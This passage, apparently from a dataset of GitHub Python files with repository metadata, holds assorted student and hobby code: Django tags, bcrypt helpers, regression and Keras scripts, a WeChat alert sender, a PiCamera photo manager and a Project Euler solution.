screen.blit("background.jpeg", (0,0))
pgzrun.go()
| UTF-8 | Python | false | false | 131 | py | 1 | project-jumper-00.py | 1 | 0.648855 | 0.587786 | 0 | 12 | 9.916667 | 41 |
Kakanaporn/Django50Hrs_ByUncleEngineer | 16,664,473,118,449 | 3aea92236098df5331126c71f1dddcb237a75a2e | 1d1606ff0b94e70bc486d5d6c9691b5a7544937e | /myapp/templatetags/custom_tags.py | e3ffa47eac098028f73f8878b2574cf3e010840c | [] | no_license | https://github.com/Kakanaporn/Django50Hrs_ByUncleEngineer | 738574d27663b573ba93bd1a4967f8a7cbe5ee37 | f1b50382d5c1b6c985af94881b13d450f8222c75 | refs/heads/master | 2023-02-27T11:14:13.526425 | 2021-01-11T09:34:43 | 2021-01-11T09:34:43 | 328,596,749 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #custom tags {% load custom_tags %}
from django import template
from ..models import Allproduct,Category
register = template.Library()
@register.simple_tag
def hello_tag(): #{% hello_tag %}
return '<-----Hello Tag----->'
@register.simple_tag
def show_allproduct():
count = Allproduct.objects.count()
return count
@register.inclusion_tag('myapp/allcategory.html')
def all_category():
cats = Category.objects.all()
return {'allcats':cats} | UTF-8 | Python | false | false | 462 | py | 21 | custom_tags.py | 9 | 0.692641 | 0.692641 | 0 | 21 | 21.047619 | 49 |
korposdavid/ask-mate-python | 9,216,999,823,649 | 026d39cb3336effc95e1b2f5c0c3200f2af17675 | 66296cae3cba84dfddb5c168bc2e13eb5fcda482 | /util.py | 13f1e7ed6d5fe1cc0ba13032f9c680a57d1c9756 | [] | no_license | https://github.com/korposdavid/ask-mate-python | 5bbef0d458c22d8e3ff9b4261443c4696dae1664 | 227b152fe81c9bdbdf4b381f6404adb33061c153 | refs/heads/master | 2020-05-23T02:25:56.696366 | 2019-06-14T10:42:57 | 2019-06-14T10:42:57 | 186,602,594 | 0 | 1 | null | true | 2019-05-14T10:48:33 | 2019-05-14T10:48:33 | 2018-10-10T08:53:40 | 2019-04-25T12:36:01 | 9 | 0 | 0 | 0 | null | false | false | from datetime import datetime
import bcrypt
import data_manager
def date_now():
dt = datetime.now()
return dt.replace(microsecond=0)
def hash_password(plain_text_password):
hashed_bytes = bcrypt.hashpw(plain_text_password.encode('utf-8'), bcrypt.gensalt())
return hashed_bytes.decode('utf-8')
def verify_password(plain_text_password, username):
try:
hashed_password = data_manager.get_hashed_password_for_user(username)
hashed_bytes_password = hashed_password.encode('utf-8')
return bcrypt.checkpw(plain_text_password.encode('utf-8'), hashed_bytes_password)
except TypeError:
return False
| UTF-8 | Python | false | false | 651 | py | 21 | util.py | 4 | 0.711214 | 0.703533 | 0 | 22 | 28.590909 | 89 |
nicy1/hmm | 12,601,434,055,948 | 8f02346540ce66b23522276890642859b8bf49ce | cd0768362e80de0aeccea77e8380213189f86271 | /Benchmark/arima/readfile.py | beebb9b90e03df69f9078d1c12ec1917ffbbeb4e | [] | no_license | https://github.com/nicy1/hmm | bfbdb4184db788d5a2afca6f5f78de6e8dce25cb | bfeb52ebf26c7ba0493628b6dab8d0ac94b9a43b | refs/heads/master | 2023-02-02T23:04:38.720606 | 2020-12-22T15:31:05 | 2020-12-22T15:31:05 | 264,662,691 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import csv
from collections import OrderedDict
# ==========================================================================
class reader:
def __init__ (self, filename):
self.filename = filename
def read_csv (self):
table = {"0":0.0, "1":1.0, "2":2.0, "4":3.0, "5":4.0}
series = []
data = csv.DictReader(open(self.filename, mode='r'))
for row in data:
x = str(row['ActionType'])
series.append(table[x])
return series
# ========================================================================== | UTF-8 | Python | false | false | 592 | py | 32 | readfile.py | 18 | 0.402027 | 0.376689 | 0 | 24 | 23.708333 | 76 |
elliotgreenlee/machine-learning-examples | 11,897,059,416,904 | c5e92eb05549798981622341d659c94cf7cde43b | f294bb670f6c15d4143e567af8222845055c9f12 | /basic_machine_learning/polynomial_regression/project1.py | f6bb88f2d29398bf78125f8097db53d2f6a9e221 | [] | no_license | https://github.com/elliotgreenlee/machine-learning-examples | 52bc0ce76c5839ca93932116769f1c8767a0c4fd | 05cf87a06a9c03185883793bea4055c69a4a2194 | refs/heads/main | 2023-04-01T08:13:24.654570 | 2021-04-14T02:28:05 | 2021-04-14T02:28:05 | 357,742,621 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from Data import *
from PolynomialRegression import PolynomialRegression
import numpy as np
import math
def rmse(real, prediction):
error = 0
for r, p in zip(real, prediction):
error += math.pow(r - p, 2)
error = math.sqrt(error / (len(real) * 1.0))
return error
def r_squared(real, prediction):
mean = 0
for instance in real:
mean += instance
mean /= len(real) * 1.0
ss_tot = 0
for instance in real:
ss_tot += math.pow(instance - mean, 2)
ss_res = 0
for r, p in zip(real, prediction):
ss_res += math.pow(r - p, 2)
r2 = 1 - (ss_res / (ss_tot * 1.0))
return r2
def print_comparison(real, prediction):
print("Real : Prediction")
for r, p in zip(real, prediction):
print("{} : {}".format(r, p))
NUMBER_OF_FEATURES = 7
NUMBER_OF_BATCHES = 5
def batch(number_of_batches, number_of_samples):
all_indices = np.arange(0, number_of_samples) # get all possible indices
np.random.shuffle(all_indices)
if number_of_batches is 1:
TRAINING_SIZE = 292
training = [all_indices[:TRAINING_SIZE]]
testing = [all_indices[TRAINING_SIZE:]]
return training, testing
remainder = number_of_samples % number_of_batches
samples_per_batch = int(number_of_samples / number_of_batches)
training_batches = []
testing_batches = []
current_index = 0
for i in range(number_of_batches):
old_index = current_index
current_index += samples_per_batch
if i < remainder:
current_index += 1
train_batch = np.concatenate((all_indices[:old_index], all_indices[current_index:]))
test_batch = all_indices[old_index:current_index]
training_batches.append(train_batch)
testing_batches.append(test_batch)
return training_batches, testing_batches
def main():
data = AutoData("auto-mpg.data", NUMBER_OF_FEATURES)
data.normalize()
data.pca_reduce(4)
data.stats()
# split data indices into NUMBER_OF_BATCHES batches
training_batches, testing_batches = batch(NUMBER_OF_BATCHES, len(data.data))
# for each batch
for training_indices, testing_indices in zip(training_batches, testing_batches):
# Nothing
training = Data()
for index in training_indices:
training.features.append(data.features[index])
training.r.append(data.r[index])
# extract testing set
testing = Data()
for index in testing_indices:
testing.features.append(data.features[index])
testing.r.append(data.r[index])
# Run regression
polynomial = PolynomialRegression(training, testing)
polynomial.train(1)
real, prediction = polynomial.test(1)
print(r_squared(real, prediction))
polynomial = PolynomialRegression(training, testing)
polynomial.train(2)
real, prediction = polynomial.test(2)
print(r_squared(real, prediction))
polynomial = PolynomialRegression(training, testing)
polynomial.train(3)
real, prediction = polynomial.test(3)
print(r_squared(real, prediction))
if __name__ == "__main__":
main()
| UTF-8 | Python | false | false | 3,223 | py | 128 | project1.py | 49 | 0.627056 | 0.617127 | 0 | 118 | 26.313559 | 92 |
anzehuang/walrus | 10,256,381,913,006 | 3aa9b963a6a03e5a3b6977e3c68747b0d46d8f75 | 0779b0bb26e948ed9bc53a977d1082072bdd463b | /walrus/pylib/pyweixin.py | 5af377f439ea2e231628de2c0423a6fdeb0a3114 | [] | no_license | https://github.com/anzehuang/walrus | b1945909034f1ce2f4f4abfd6cdd69acf9af3cf6 | 2f3e9fa880ed8a0dae0114198cdad9f1ff6e61dc | refs/heads/master | 2015-08-12T13:38:15 | 2014-07-16T10:07:31 | 2014-07-16T10:07:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# coding:utf-8
import urllib
import urllib2
#from poster.encode import multipart_encode
#from poster.streaminghttp import register_openers
Sender = "walrus_admin"
def send_weixin(receiver, msg, flag=0):
'''
接口使用说明:
注意:消息中的中文字符串前面不要加'u'
1. flag == 0: text, 文字,默认值
eg. msg = "微信报警,让运维的工作从此变得轻松。"
2. flag == 1: chart, 曲线图
eg. msg = {"title":"微信报警曲线图标题",
"desc1":"图例描述1",
"desc2":"图例描述2",
"desc3":"图例描述3",
"label":["19:38","19:39","19:40","19:41","19:42","19:43","19:44","19:45","19:46","19:47"],
"data1":["3165","3123","3144","11003","11209","2309","3144","3165","3146","3193"],
"data2":["3365","2123","2244","3033","1109","2203","1144","3265","2126","3143"],
"data3":["3263","3113","3134","2003","1209","2109","1244","3163","3346","3193"]}
3. flag == 2: table, 数据表
eg. msg = {"header":["时间","系统调用数","系统失败数","系统失败率","端口调用数","端口失败数","端口失败率"],
"data1":["19:00","1234","3","0.3%","13023","10","0.01%"]
,"data2":["19:05","1230","3","0.3%","12423","20","0.01%"]
,"data3":["19:10","1134","30","0.3%","11423","10","0.01%"]
,"data4":["19:15","1034","33","0.3%","12423","30","0.01%"]
,"data5":["19:20","1004","322","0.3%","13323","60","0.01%"]
,"data6":["19:25","834","333","0.3%","9123","100","0.01%"]
}
'''
receiver = receiver.replace(' ', '')
receiver = receiver.split(";")
if '' in receiver:
receiver.remove('')
Rcptto = receiver
d_escape = {
"\a": "\\a",
"\b": "\\b",
"\n": "\\n",
"\t": "\\t",
"\v": "\\v",
"\r": "\\r",
"\f": "\\f",
"\000": "\\000"
}
encodeChartTable = {}
# 替换转义字符
for escape in d_escape:
if isinstance(msg, str):
msg = msg.replace(escape, d_escape[escape])
elif isinstance(msg, dict):
for k in msg:
if isinstance(msg[k], list):
msg[k] = [v.replace(escape, d_escape[escape]) for v in msg[k]]
encodeChartTable[k] = [urllib.quote(v) for v in msg[k]]
else:
msg[k] = msg[k].replace(escape, d_escape[escape])
encodeChartTable[k] = urllib.quote(msg[k])
else:
raise Exception("Unknown message format! please the message defined by yourself!")
if flag == 0:
# text, 文字
jsondata = str({"Sender": Sender,
"Rcptto": Rcptto,
"isText": urllib.quote(msg)}).replace("\'", "\"")
elif flag == 1 or flag == 2:
# chart, 曲线图; table, 数据表
jsondata = str({"Sender": Sender,
"Rcptto": Rcptto,
"isChart" if flag == 1 else "isTable": encodeChartTable}).replace("\'", "\"")
else:
raise Exception("Unknown message type! the flag must be in [0,1,2]!")
request = urllib2.Request(url='http://10.185.8.11/cgi-bin/sendmsg', data='data=%s'%jsondata)
ret_str = urllib2.urlopen(request).read()
# 微信反馈失败!发送微信错误消息
if '"errCode":"0"' not in ret_str:
sTemp = ret_str.split(',')
sTemp = sTemp[1].split(':')
isText = "微信反馈失败!失败原因:消息格式" + sTemp[1].strip("\"").decode("gbk").encode("utf-8")
jsondata = str({"Sender": Sender,
"Rcptto": Rcptto,
"isText": urllib.quote(isText)}).replace("\'", "\"")
request = urllib2.Request(url='http://10.185.8.11/cgi-bin/sendmsg', data='data=%s' % jsondata)
return urllib2.urlopen(request).read()
if __name__ == '__main__':
receiver = "anzehuang"
msg = "不是有效地JSON数据结构"
send_weixin(receiver, msg)
| UTF-8 | Python | false | false | 4,240 | py | 160 | pyweixin.py | 94 | 0.47269 | 0.382338 | 0 | 100 | 38.18 | 106 |
AryeYellow/PyProjects | 11,201,274,744,751 | f56ff5dfd689588672678e868f8b3732d0c68690 | 0cf87d20da6438f6b6831a4d385ecd88d9b5a45e | /Keras/TextGeneration/cnn_train.py | 4c94ce9c1b2fb429e467cbf34a3fe0d9c71ab79a | [] | no_license | https://github.com/AryeYellow/PyProjects | 038a221f6b027e1b024c3effc957dc8709f4f974 | fcbf3a4c7fc7f1cdd989f7eb1dc389a9af6540e6 | refs/heads/master | 2020-05-21T04:06:37.991879 | 2019-10-29T11:18:49 | 2019-10-29T11:18:49 | 185,904,582 | 25 | 23 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np, os
from collections import Counter
from keras.utils import to_categorical
from keras.models import Sequential, load_model
from keras.layers import Conv1D, MaxPool1D, GlobalMaxPool1D, Dense
from TextGeneration.conf import *
from warnings import filterwarnings
filterwarnings('ignore') # 不打印警告
def preprocessing():
"""语料加载"""
with open(corpus_path, encoding='utf-8') as f:
seq_chr = f.read().replace('\n', '')
"""数据预处理"""
len_seq = len(seq_chr) # 语料长度
chr_ls = Counter(list(seq_chr)).most_common(len_chr)
chr_ls = [i[0] for i in chr_ls]
chr2id = {c: i for i, c in enumerate(chr_ls)}
id2chr = {i: c for c, i in chr2id.items()}
seq_id = [chr2id[c] for c in seq_chr] # 文字序列 --> 索引序列
yield len_seq, id2chr, seq_id
"""输入层和标签"""
reshape = lambda x: np.reshape(x, (-1, window, 1)) / len_chr
x = [seq_id[i: i + window] for i in range(len_seq - window)]
x = reshape(x)
y = [seq_id[i + window] for i in range(len_seq - window)]
y = to_categorical(y, num_classes=len_chr)
print('x.shape', x.shape, 'y.shape', y.shape)
yield reshape, x, y
(len_seq, id2chr, seq_id), (reshape, x, y) = list(preprocessing())
"""建模"""
if os.path.exists(filepath):
print('load_model')
model = load_model(filepath)
else:
print('modeling')
model = Sequential()
model.add(Conv1D(filters, kernel_size * 2, padding='same', activation='relu'))
model.add(MaxPool1D())
model.add(Conv1D(filters * 2, kernel_size, padding='same', activation='relu'))
model.add(GlobalMaxPool1D())
model.add(Dense(len_chr, activation='softmax'))
model.compile('adam', 'categorical_crossentropy')
def draw_sample(predictions, temperature):
"""随机采样"""
pred = predictions.astype('float64') # 提高精度防报错
pred = np.log(pred) / temperature
pred = np.exp(pred)
pred = pred / np.sum(pred)
pred = np.random.multinomial(1, pred, 1)
return np.argmax(pred)
def predict(t, pred=None):
"""预测"""
if pred is None:
randint = np.random.randint(len_seq - window)
pred = seq_id[randint: randint + window]
if t:
print('随机采样,温度:%.1f' % t)
sample = draw_sample
else:
print('贪婪采样')
sample = np.argmax
for _ in range(window):
x_pred = reshape(pred[-window:]) # 窗口滑动
y_pred = model.predict(x_pred)[0]
i = sample(y_pred, t)
pred.append(i)
text = ''.join([id2chr[i] for i in pred[-window:]])
print('\033[033m%s\033[0m' % text)
"""训练及评估"""
for e in range(times):
model.fit(x, y, batch_size, epochs, verbose=2)
model.save(filepath)
print(str(e + 1).center(window * 2, '-'))
# 训练效果展示
for t in (None, 1, 1.5, 2):
predict(t)
| UTF-8 | Python | false | false | 2,984 | py | 78 | cnn_train.py | 29 | 0.592031 | 0.576869 | 0 | 89 | 29.865169 | 82 |
ZJanPei/PyQtLearn | 8,126,078,133,835 | dbe63a9ebaa211b4a48c4f89243ed8ccd33a2235 | 53fc3ca7147b646100950b08741a19546c3ebf88 | /ui/ui_Main.py | 605edc334341186d0879e7223b4ba4da82159d34 | [] | no_license | https://github.com/ZJanPei/PyQtLearn | 33721a0857e32470718c1db17e06f52818c59ed7 | 0611ab838640bbd73452e717ed4cc1cfac41d3c1 | refs/heads/master | 2020-03-16T15:31:10.621833 | 2018-05-15T03:40:20 | 2018-05-15T03:40:20 | 132,746,992 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'Main.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Main(object):
def setupUi(self, Main):
Main.setObjectName("Main")
Main.resize(400, 300)
self.LoginpushButton = QtWidgets.QPushButton(Main)
self.LoginpushButton.setGeometry(QtCore.QRect(30, 30, 75, 23))
self.LoginpushButton.setObjectName("LoginpushButton")
self.retranslateUi(Main)
QtCore.QMetaObject.connectSlotsByName(Main)
def retranslateUi(self, Main):
_translate = QtCore.QCoreApplication.translate
Main.setWindowTitle(_translate("Main", "Form"))
self.LoginpushButton.setText(_translate("Main", "登录"))
| UTF-8 | Python | false | false | 844 | py | 16 | ui_Main.py | 14 | 0.688095 | 0.665476 | 0 | 25 | 32.56 | 70 |
Buguemar/PIIC19 | 17,961,553,265,553 | 0c077ab4c57cc2ce3aa11284318a3d093d2b3221 | e083533a1b00eb49acaa6ca6773b4e5605ba92ee | /code/obj1/old_stuff/run_GAF.py | 2623234492850ec8f243c29588352b7ae1453956 | [] | no_license | https://github.com/Buguemar/PIIC19 | 913729c2c77ca8712e9dfc4ab817e0f277dd8ba7 | 54a5743b8660b8209c9b70d65e1cef04f7622575 | refs/heads/master | 2023-06-06T17:46:37.755334 | 2021-07-15T08:16:08 | 2021-07-15T08:16:08 | 184,789,297 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
from IPython.display import display, Image
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import os, sys ,gc, math, time
from PIL import Image
from keras.layers import *
from keras.models import Sequential
from keras import backend as K
from optparse import OptionParser
op = OptionParser()
op.add_option("-s", "--size", type="string", default="20", help="size of matrix to generate")
op.add_option("-p", "--pool", type="int", default=2, help="pool size")
(opts, args) = op.parse_args()
winds = opts.size.lower().split("/")
pool = opts.pool
dirpath = os.getcwd().split("code")[0]+"code/"
sys.path.append(dirpath)
from pre_process import clean_LC
our_process = np.load('/work/work_teamEXOPLANET/KOI_LC/cleaned/LC_kepler_processed.npy')
#### importante:
def prepare_lc_GAF(fluxs): #rango entre -1 y 1
max_f = np.nanmax(fluxs)
min_f = np.nanmin(fluxs)
return (2*fluxs- max_f - min_f)/(max_f-min_f)
class GAF(object):
def __init__(self, fluxs):
self.X_cos = np.asarray(fluxs).astype('float32')
I = np.ones(self.X_cos.shape[0], dtype='float32')
self.X_sin = np.sqrt(np.clip(I - self.X_cos**2, 0, 1))
def transform(self, method='sum'):
if method == 'sum':
return np.tensordot(self.X_cos, self.X_cos, axes=-1) - np.tensordot(self.X_sin, self.X_sin, axes=-1)
elif method == "diff":
return np.tensordot(self.X_sin, self.X_cos, axes=-1) - np.tensordot(self.X_cos, self.X_sin, axes=-1)
#T = our_process.shape[1]
#reduc = T/float(wind) ##########OJO
#repeat = math.floor(np.log(reduc)/np.log(pool))
#model = Sequential()
#model.add(InputLayer(input_shape=(T,T)))
#model.add(Lambda(lambda x: K.expand_dims(x, axis=-1)))
#for _ in range(repeat):
# model.add(AveragePooling2D(pool))
#model.add(Lambda(lambda x: K.squeeze(x, axis=-1)))
def resize_image(img, w):
# return model.predict(img[None,:,:])[0]
aux = Image.fromarray(img)
to_return = aux.resize((w,w), Image.NEAREST)
aux.close()
return np.asarray(to_return)
#file_name_S = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%wind
#file_name_D = "/work/work_teamEXOPLANET/GAF/GADF_%s.npy"%wind
print("ATENCION, ESTA EJECUTANDO MULTIPLES SIZE DE RESHAPE, LEERA TODOS LOS DATOS SECUENCIALES, COMO PUNTO DE PARTIDA EL ULTIMO SIZE QUE PUSO EN LOS ARCHIVOS GUARDADOS!! NO EJECUTE MULTIPLES SIZE EN DIFERENTES CODIGOS")
file_aux = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%winds[-1]
if os.path.isfile(file_aux):
i = np.load(file_aux).shape[0]
else:
i=0
print("Starting in >>> ",i)
for lc_our_detrend in our_process[i:]:
print ("Procesando curva",i)
fluxs = prepare_lc_GAF(lc_our_detrend) #scale -1 y 1
#mask_nans = np.isnan(fluxs)
#fluxs[mask_nans] = 0 #or mask value
model_gaf = GAF(fluxs)
X_gasf = model_gaf.transform(method='sum')
#X_gasf[mask_nans,:] = 0
#X_gasf[:,mask_nans] = 0
X_gadf = model_gaf.transform(method='diff')
#X_gadf[mask_nans,:] = 0
#X_gadf[:,mask_nans] = 0
to_save_S = []
to_save_D = []
for wind in winds:
print(">>> size ** %s ** ..."%wind,end='')
file_name_S = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%wind
file_name_D = "/work/work_teamEXOPLANET/GAF/GADF_%s.npy"%wind
X_gasf_res = resize_image(X_gasf, int(wind))
X_gadf_res = resize_image(X_gadf, int(wind))
if i ==0:
X_total_gasf = X_gasf_res[None,:,:]
else:
X_total_gasf = np.load(file_name_S)[:i] #avoid write/read errors
X_total_gasf = np.append(X_total_gasf, X_gasf_res[None,:,:], axis=0)
to_save_S.append(X_total_gasf)
if i ==0:
X_total_gadf = X_gadf_res[None,:,:]
else:
X_total_gadf = np.load(file_name_D)[:i] #avoid write/read errors
X_total_gadf = np.append(X_total_gadf, X_gadf_res[None,:,:], axis=0)
to_save_D.append(X_total_gadf)
del X_gasf_res, X_gadf_res, X_total_gadf, X_total_gasf
print(" completado")
del X_gasf, X_gadf #borrar originales y trabajar con las chicas solamente
print(">>> Comienza a guardar archivos", end='')
for wind, value_S, value_D in zip(winds,to_save_S,to_save_D):
file_name_S = "/work/work_teamEXOPLANET/GAF/GASF_%s.npy"%wind
file_name_D = "/work/work_teamEXOPLANET/GAF/GADF_%s.npy"%wind
np.save(file_name_S, value_S)
np.save(file_name_D, value_D)
print(" todos archivos guardados con exito!")
del model_gaf, fluxs, to_save_S, to_save_D
gc.collect()
i+=1
print("TERMINADO!!!!!!!!")
| UTF-8 | Python | false | false | 4,677 | py | 181 | run_GAF.py | 23 | 0.617276 | 0.608724 | 0 | 132 | 34.424242 | 219 |
momentum-cohort-2018-10/w1d2-house-hunting-Komor-RP | 7,645,041,811,256 | 5cbc5d98bfb67df99d21da5643543e461660b156 | 9d324f74bd7c383e283bf5e0e71f13c34a862ae4 | /house-hunting.py | 98ba2c1e9fd31ee73bc03a08580ea9b9f5613afc | [] | no_license | https://github.com/momentum-cohort-2018-10/w1d2-house-hunting-Komor-RP | 2fca593860575771dd4ed638262956ba79523214 | f25768e24f299d2c61f5cb4997d31fc17208eb6d | refs/heads/master | 2020-04-03T16:00:59.193308 | 2018-10-30T14:29:40 | 2018-10-30T14:29:40 | 155,387,463 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | annual_salary = input("Enter your annual salary: ")
portion_saved = input("Enter the percent of your salary to save, as a decimal: ")
rate_of_return = input("Enter the expected annual rate of return [0.04]: ")
total_cost = input("Enter the cost of your dream home: ")
portion_down_payment = input("Enter the percent of your home's cost to save as a down payment [0.25]: ")
annual_salary = float(annual_salary)
portion_saved = float(portion_saved)
if (rate_of_return):
rate_of_return = float(rate_of_return)
total_cost = float(total_cost)
if (portion_down_payment):
portion_down_payment = float(portion_down_payment)
def number_of_months(annual_salary, portion_saved, total_cost, portion_down_payment=.25, rate_of_return=.04):
months = 0
current_savings = 0
while (current_savings < (total_cost * portion_down_payment)):
current_savings = current_savings + (current_savings * (rate_of_return / 12))
current_savings = current_savings + (portion_saved * annual_salary / 12)
months += 1
print("Number of months: " + str(months))
number_of_months(annual_salary, portion_saved, total_cost) | UTF-8 | Python | false | false | 1,166 | py | 1 | house-hunting.py | 1 | 0.684391 | 0.669811 | 0 | 32 | 35.46875 | 109 |
sannareddy/openerp-heimai | 6,476,810,718,139 | 0b74134e6c0a2cbb3e0a3060522bf84ee4563f8e | a2ac73af04a07bb070cd85c88778608b561dd3e4 | /addons/account_followup/account_followup.py | 121234d91da0b2c3b342cc9dd054ad7e95d5ba92 | [] | no_license | https://github.com/sannareddy/openerp-heimai | c849586d6099cc7548dec8b3f1cc7ba8be49594a | 58255ecbcea7bf9780948287cf4551ed6494832a | refs/heads/master | 2021-01-15T21:34:46.162550 | 2014-05-13T09:20:37 | 2014-05-13T09:20:37 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | /usr/share/pyshared/openerp/addons/account_followup/account_followup.py | UTF-8 | Python | false | false | 71 | py | 9,135 | account_followup.py | 1,609 | 0.859155 | 0.859155 | 0 | 1 | 71 | 71 |
diaopk/group_project | 1,056,562,001,897 | a0a1b102db22815ead8057ff8bae54ff7ebc4900 | 60973db6a73f846d101f8456768c921d0333ca47 | /pc.py | 33071e07d77bf53bcfa95b516b434953635e9b0b | [] | no_license | https://github.com/diaopk/group_project | 547400873684361e546801dbdd3d0990730a563a | 427837af551bca3df0ec12adedb554174a18ab49 | refs/heads/master | 2021-01-20T08:01:56.251769 | 2019-09-13T15:57:22 | 2019-09-13T15:57:22 | 90,089,519 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/...
# This script defines a Photo Manager that implements the iterator protocol
# to store and orgnise photos
# ,and a Photo object
# Import required modules
from picamera import *
from datetime import datetime
from os import listdir
from re import search
# Photo Manager
class Photo_Manager:
def __init__(self):
self.camera = PiCamera()
#self.camera.resolution(800,480)
self.photo_seq = self.__browse() # photo_seq holds a sequence of photo objects
self.index = 0 # index hold the current index of a photo object
self.current_photo = self.photo_seq[self.index] # current photo object
def __iter__(self): return self
def get_photos(self): return self.photo_seq
def get_current_photo(self): return self.current_photo
def get_index(self): return self.index
# Method to take photo and store it into the photo_seq
def take_photo(self):
time = datetime.now()
path = './test_picamera/%s.jpg' % time
self.camera.capture(path)
photo = Photo(path, time)
self.photo_seq.append(photo)
self.current_photo = self.photo_seq[0]
# Method to list all photos in the directory
# and store them as photo objects into photo_seq
def __browse(self):
lst = listdir('./test_picamera/')
res_lst = []
for photo in lst:
if search('.jpg$', str(photo)):
path = './test_picamera/' + str(photo)
time = photo.partition('.jpg')[0]
res_lst.append(Photo(path, time))
elif search('.png$', str(photo)):
path = './test_picamera/' + str(photo)
time = photo.partition('.png')[0]
res_lst.append(Photo(path, time))
return res_lst
# Method to return next photo object
# and set index and current_photo to the next photo object
def next(self):
"""try:
self.index += 1
self.current_photo = self.photo_seq[self.index].get_path()
return self.photo_seq[self.index]
except StopIteration, e:
print 'stop', e
#pass
return None"""
if self.index < len(self.photo_seq) -1:
self.index += 1
self.current_photo = self.photo_seq[self.index]
return self.photo_seq[self.index]
else:
print 'stop'
raise
# Method to return previous photo object
# and set index and current_photo to the previous photo object
def up(self):
try:
self.index -= 1
self.current_photo = self.photo_seq[self.index]
except StopIteration, e:
print 'stop', e
pass
return self.photo_seq[self.index]
# Method to return the first photo object of the photo_seq
# and set index and current_photo to the first photo object
def first(self):
if len(self.photo_seq) >= 1:
self.refresh()
return self.photo_seq[0]
else:
print 'empty photo_seq'
pass
# Method to return the last photo object of the phpoto_seq
# and set index and current_photo to the last photo object
def last(self):
if len(self.photo_seq) == 1:
self.refresh()
return self.photo_seq[0]
elif len(self.photo_seq) > 1:
self.index = len(self.photo_seq) - 1
self.current_photo = self.photo_seq[len(self.photo_seq)-1]
return self.photo_seq[len(self.photo_seq)-1]
else:
print 'Empty photo_seq'
pass
# Method to make current photo back to the origional state
# and set index and current_photo to the first photo object
def refresh(self):
if len(self.photo_seq) == 0:
pass
else:
self.index = 0
self.current_photo = self.photo_seq[0]
# Photo object
class Photo:
def __init__(self, path, datetime):
self.path = path
self.datetime = datetime
def get_datetime(self): return self.datetime
def get_path(self): return self.path
| UTF-8 | Python | false | false | 4,140 | py | 13 | pc.py | 11 | 0.583816 | 0.577778 | 0 | 123 | 32.658537 | 86 |
bryanmartineze/proyectos-python | 652,835,042,584 | 8f6fc993ef071e2e5b749dfd56f8420de6747b09 | 1f3763d72d284d81a88de8e1b1f83c89c3811479 | /tuples/tuples.py | 92c48ded8a25b32c069e6d7fe8edf4a9b42e1b12 | [] | no_license | https://github.com/bryanmartineze/proyectos-python | c56a5028cc4743b5d4b91dedc554645207e8b2d2 | c575de3cee365fba25a7fddc6ce56d27d6adbac1 | refs/heads/master | 2023-07-26T03:42:33.390950 | 2021-08-26T00:03:35 | 2021-08-26T00:03:35 | 393,833,114 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #Las tuplas son variables que pueden guardar una colección de datos
coordenadas = (3, 5)
#Las tuplas son inmutables, que no pueden cambiarse ni modificarse
# print(coordenadas)
# #Podemos mostrar el numero de una tupla
# print(coordenadas[1])
#Podemos crear listas de tuplas
lista_de_coordenadas = [(3,5), (6,4), (3.7,80,12)]
print(lista_de_coordenadas) | UTF-8 | Python | false | false | 361 | py | 15 | tuples.py | 14 | 0.738889 | 0.702778 | 0 | 16 | 21.5625 | 67 |
berayboztepe/Examples | 10,161,892,647,235 | cbf92bf84e70aefbd19490a2cf5fab623cc6c0d3 | 95d309891dcec0a27a81a6930b1846e4b8bec131 | /Project Euler/project-euler-32.py | 6c7f3969422adcc79eb9db17c53cbc66b2157d7d | [] | no_license | https://github.com/berayboztepe/Examples | ef4ed8c68d442115862509118ae70d911c464f1d | 3d2abb6918d183245436444b164ae7b0268c521a | refs/heads/main | 2023-04-29T23:08:00.117527 | 2022-11-14T19:42:03 | 2022-11-14T19:42:03 | 308,640,780 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # We shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once; for example,
# the 5-digit number, 15234, is 1 through 5 pandigital.
# The product 7254 is unusual, as the identity, 39 × 186 = 7254, containing multiplicand, multiplier, and product is 1 through 9 pandigital.
# Find the sum of all products whose multiplicand/multiplier/product identity can be written as a 1 through 9 pandigital.
# HINT: Some products can be obtained in more than one way so be sure to only include it once in your sum.
list, list1, list2, list4 = [], [], [], []
sum = 0
def my_frequency_with_dic(list):
frequency_dict = {}
for item in list:
if(item in frequency_dict):
return 0
else:
frequency_dict[item] = 1
return frequency_dict
for j in range(10, 10000):
ab = j
q = 0
while ab:
digit = ab % 10
if not digit in list:
list.append(digit)
else:
list.clear()
q = 1
break
ab //= 10
if q == 1:
continue
for i in range(2, int((j**(1/2))) + 1):
b = i
if j % i == 0:
a = int(j/i)
while i:
digit = i % 10
list1.append(digit)
i //= 10
while a:
digit = a % 10
list2.append(digit)
a //= 10
list4 += list1
list4 += list2
list4 += list
dict = my_frequency_with_dic(list4)
if not dict == 0:
for k in range(1, 10):
if 0 in dict.keys():
list4.clear()
list1.clear()
list2.clear()
break
if k in dict.keys():
if k == 9:
print(j, b, j/b)
q = 1
sum += j
else:
continue
else:
list4.clear()
list1.clear()
list2.clear()
break
else:
list4.clear()
list1.clear()
list2.clear()
if q == 1:
break
list.clear()
print(sum)
| UTF-8 | Python | false | false | 2,487 | py | 91 | project-euler-32.py | 52 | 0.417538 | 0.383749 | 0 | 80 | 29.075 | 140 |
